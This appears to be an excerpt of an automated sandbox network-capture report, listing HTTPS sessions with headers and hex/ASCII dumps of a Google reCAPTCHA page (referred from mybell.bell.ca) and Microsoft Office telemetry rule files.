                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2GFShs-93dLogruoUi1fyA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC217INData Raw: 35 37 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 57c9<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /css">/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44
                                                                                                                                                                                                                                                                                                                                      Data Ascii: U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: t-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto';
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: m/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: : normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 32 47 46 53 68 73 2d 39 33 64 4c 6f 67 72 75 6f 55 69 31 66 79 41 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 20 63 6c 61 73 73 3d 22 72 63 2d 61 6e 63 68 6f 72 2d 61 6c 65 72 74 22 3e 3c 2f 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: type="text/javascript" src="https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js" nonce="2GFShs-93dLogruoUi1fyA"> </script></head><body><div id="rc-anchor-alert" class="rc-anchor-alert"></div><input type="hidde
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 77 36 58 46 53 47 5a 39 47 37 31 77 42 67 62 44 65 7a 62 72 65 37 4a 71 47 4e 47 37 54 39 49 56 4f 5a 4c 39 33 59 71 41 64 38 33 4b 6d 47 73 74 58 73 58 7a 54 6d 37 68 64 71 4c 37 6c 31 4d 38 75 56 46 47 6c 6b 4e 31 6a 5a 74 49 38 67 39 61 33 68 2d 77 32 71 32 4b 49 58 79 35 5a 41 67 54 58 65 44 51 6f 30 4d 70 4e 50 53 79 48 4e 30 43 32 39 77 59 54 47 34 43 63 38 67 49 6f 53 31 4b 49 57 56 73 62 44 34 6b 4a 33 59 2d 30 61 39 6a 38 46 5f 58 57 45 43 45 53 4e 57 46 45 2d 77 4e 37 34 2d 4d 5f 66 2d 2d 75 72 6e 32 37 6c 4e 76 6e 65 61 32 4a 67 76 36 6c 34 72 64 4c 38 61 66 48 74 71 59 77 42 32 53 70 79 57 35 45 6a 43 30 65 34 33 62 65 66 5a 50 4a 61 42 56 61 53 64 5a 32 43 77 73 4a 59 50 32 65 56 7a 57 5f 55 4c 53 6b 75 50 41 67 4b 4a 68 6f 56 57 57 6a 48 37
                                                                                                                                                                                                                                                                                                                                      Data Ascii: w6XFSGZ9G71wBgbDezbre7JqGNG7T9IVOZL93YqAd83KmGstXsXzTm7hdqL7l1M8uVFGlkN1jZtI8g9a3h-w2q2KIXy5ZAgTXeDQo0MpNPSyHN0C29wYTG4Cc8gIoS1KIWVsbD4kJ3Y-0a9j8F_XWECESNWFE-wN74-M_f--urn27lNvnea2Jgv6l4rdL8afHtqYwB2SpyW5EjC0e43befZPJaBVaSdZ2CwsJYP2eVzW_ULSkuPAgKJhoVWWjH7
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 4a 52 47 35 47 56 56 68 6b 61 55 6c 74 61 44 68 5a 55 6d 78 48 5a 56 46 45 4e 32 78 46 57 57 64 55 4d 6e 42 7a 4d 32 56 7a 57 6b 31 4b 65 44 41 77 59 33 4a 69 63 6d 31 44 55 79 38 77 57 69 74 31 64 6b 6c 46 56 33 5a 75 4b 31 42 6b 53 6c 6c 55 4d 69 74 76 4d 30 4a 50 4d 45 6f 33 61 55 34 31 61 31 49 35 59 6d 31 4d 55 7a 42 6e 64 46 6b 78 56 30 68 4c 54 7a 6c 52 56 54 68 31 57 54 6c 59 5a 45 74 6b 52 58 56 35 53 48 56 72 59 56 64 51 55 6a 42 69 52 55 35 6b 63 47 6f 7a 61 6d 68 71 4e 33 45 77 57 6a 4a 72 57 6d 31 59 56 48 59 31 52 7a 5a 4b 61 6c 4e 43 4c 33 56 5a 52 44 5a 45 55 6c 70 5a 56 47 73 76 52 33 42 77 4b 30 56 35 4f 55 5a 4b 55 6d 52 75 4d 57 78 6a 57 57 64 30 64 46 56 42 52 47 5a 78 5a 56 46 43 59 55 64 71 56 47 4e 32 4e 32 77 7a 61 48 46 4e 4f 46
                                                                                                                                                                                                                                                                                                                                      Data Ascii: JRG5GVVhkaUltaDhZUmxHZVFEN2xFWWdUMnBzM2VzWk1KeDAwY3Jicm1DUy8wWit1dklFV3ZuK1BkSllUMitvM0JPMEo3aU41a1I5Ym1MUzBndFkxV0hLTzlRVTh1WTlYZEtkRXV5SHVrYVdQUjBiRU5kcGozamhqN3EwWjJrWm1YVHY1RzZKalNCL3VZRDZEUlpZVGsvR3BwK0V5OUZKUmRuMWxjWWd0dFVBRGZxZVFCYUdqVGN2N2wzaHFNOF
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1378INData Raw: 30 4e 68 53 6c 70 58 53 6e 56 6a 63 30 68 53 65 6e 56 5a 54 45 39 68 4f 57 74 46 4d 57 78 4f 64 33 4a 72 65 6d 70 50 62 6b 52 6f 56 6b 70 52 5a 30 63 72 4f 46 6c 6d 63 32 5a 4e 52 6d 31 58 63 6d 52 30 62 47 56 48 59 6b 55 33 4d 30 6c 6e 56 6b 35 50 63 45 78 77 63 44 64 71 57 6b 35 59 59 31 4e 56 4d 56 67 72 53 55 5a 6e 57 54 59 76 65 6a 52 53 62 56 52 54 4e 6c 55 30 51 31 4a 78 4d 57 78 47 65 6e 52 6e 53 57 31 75 4e 33 52 75 4f 47 64 57 59 54 4d 30 55 6c 42 53 4d 55 52 4e 4d 45 4e 6c 5a 6e 42 69 52 47 74 72 4d 6d 34 7a 62 30 31 36 55 47 59 35 5a 48 70 68 4d 58 64 48 64 54 5a 69 61 57 52 45 52 6c 49 32 65 6b 70 32 5a 6a 68 30 63 6d 63 33 62 7a 4a 69 59 6e 70 55 4f 56 70 6b 56 46 70 4b 57 47 30 35 63 30 70 33 5a 46 46 4f 4c 33 6c 6b 4e 45 74 6c 59 6e 4d 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0NhSlpXSnVjc0hSenVZTE9hOWtFMWxOd3JrempPbkRoVkpRZ0crOFlmc2ZNRm1XcmR0bGVHYkU3M0lnVk5PcExwcDdqWk5YY1NVMVgrSUZnWTYvejRSbVRTNlU0Q1JxMWxGenRnSW1uN3RuOGdWYTM0UlBSMURNMENlZnBiRGtrMm4zb016UGY5ZHphMXdHdTZiaWRERlI2ekp2Zjh0cmc3bzJiYnpUOVpkVFpKWG05c0p3ZFFOL3lkNEtlYnMr


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      140192.168.2.94994513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 7be90567-f01e-00aa-3367-2a8521000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131214Z-159b85dff8fj5jwshC1DFW3rgc00000001d0000000001dgx
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      141192.168.2.94994713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d859240f-301e-001f-2a4c-2baa3a000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131214Z-15b8d89586f42m673h1quuee4s0000000dp0000000008d44
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      142192.168.2.94994813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131214Z-16849878b78x6gn56mgecg60qc0000000bcg0000000097vt
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
